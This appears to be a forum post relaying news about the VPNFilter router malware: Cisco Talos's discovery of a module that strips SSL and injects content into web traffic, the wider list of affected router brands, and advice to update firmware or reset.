Posts: 6,071 +50
We already knew that the malware, which is said to originate in Russia, can collect data, infect other devices, steal credentials, and even destroy a device by overwriting a critical portion of its firmware. Cisco Talos has now discovered a new stage 3 module that can bypass SSL encryption by intercepting outgoing web requests and turning them into non-encrypted HTTP, helping it to steal sensitive data.
Additionally, the new module can use man-in-the-middle attacks to inject malicious content into web traffic. Another newly discovered feature is the malware’s ability to infect other devices, including PCs on the same local network.
It appears that more routers are affected than previously thought, too. A handful of devices from Linksys, MikroTik, Netgear, QNAP, and TP-Link were originally said to be the only ones vulnerable, but it seems more models from these brands, along with routers from Asus, D-Link, Huawei, Ubiquiti, Upvel and ZTE, are also at risk. You can see the full list at the bottom of this page.
While VPNFilter is mostly targeting routers in Ukraine, suggesting a political motivation, it's strongly recommended that all owners of the affected routers update their firmware or perform a factory reset.